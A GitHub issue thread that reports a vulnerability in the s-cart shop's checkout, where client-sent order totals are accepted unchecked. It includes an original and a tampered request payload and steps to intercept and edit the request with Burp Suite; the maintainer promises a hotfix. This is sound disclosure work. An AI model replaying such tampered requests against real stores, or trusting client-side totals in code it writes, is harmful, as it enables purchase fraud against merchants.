### ISSUE TITLE
Vulnerability in checkout

### ISSUE THREAD

**Issue by kukuxumushi** [lanhktc/s-cart#27]
Hello @lanhktc , i found a high severity vulnerability in your project.
I check it in demo version.
When user press checkout, he can intercept request and change everything in this request. 
For example, decoded checkout requests:
`_token=5MZPBpUMLHEguJ1A9oD4WBmKLBqKo6VONmzSuPGf&address={"toname":"jhfgd","email":"test@example.com","address1":"fds","address2":"312","phone":"01234324234","comment":"site has been hacked"}&dataTotal=[{"title":"Sub Total","code":"subtotal","value":30000,"text":"$30,000","sort":1},{"title":"Shipping Standard","code":"shipping","value":20000,"text":"$20,000","sort":10},{"title":"Discount","code":"discount","value":0,"text":"$0","sort":20},{"title":"Total","code":"total","value":50000,"text":"$50,000","sort":100},{"title":"Received","code":"received","value":0,"text":"$0","sort":200}]&payment=Cash&shipping=ShippingStandard`

We can change in dataTotal every field without any validation and it will be pass to admin panel.

Impact: we can buy anything for our custom price (even zero), we can make shipping free.

Steps to reproduce:
1. Add to cart any items.
2. Press `Checkout` button.
3. Intercept the request that will be sent when you click on the `Complete Order` button (you can do it with burp suite).
4. Change value of items in request to different one and forward it.
5. Your order will be posted with your custom price.

Examples:

- Original request: 
`dataTotal=[{"title":"Sub Total","code":"subtotal","value":30000,"text":"$30,000","sort":1},{"title":"Shipping Standard","code":"shipping","value":20000,"text":"$20,000","sort":10},{"title":"Discount","code":"discount","value":0,"text":"$0","sort":20},{"title":"Total","code":"total","value":50000,"text":"$50,000","sort":100},{"title":"Received","code":"received","value":0,"text":"$0","sort":200}]&payment=Cash&shipping=ShippingStandard`

- Modified request:
`dataTotal=[{"title":"Sub Total","code":"subtotal","value":5000,"text":"$5,000","sort":1},{"title":"Shipping Standard","code":"shipping","value":2000,"text":"$2,000","sort":10},{"title":"Discount","code":"discount","value":0,"text":"$0","sort":20},{"title":"Total","code":"total","value":7000,"text":"$7,000","sort":100},{"title":"Received","code":"received","value":0,"text":"$0","sort":200}]&payment=Cash&shipping=ShippingStandard`

In this example we decrease price of item to 5000$ + 2000$ for shipping = 7000$ instead of 30000$ for item + 20000$ = for shipping = 50000$
How it looks like in admin panel:
![2019-08-12 20-08-34 Admin   Order manager - Google Chrome](https://user-images.githubusercontent.com/32988979/62883707-6237f580-bd3d-11e9-930a-29f4f31a105a.png)

**Comment by lanhktc** [comment]
Thanks. A hotfix will update for next release soon
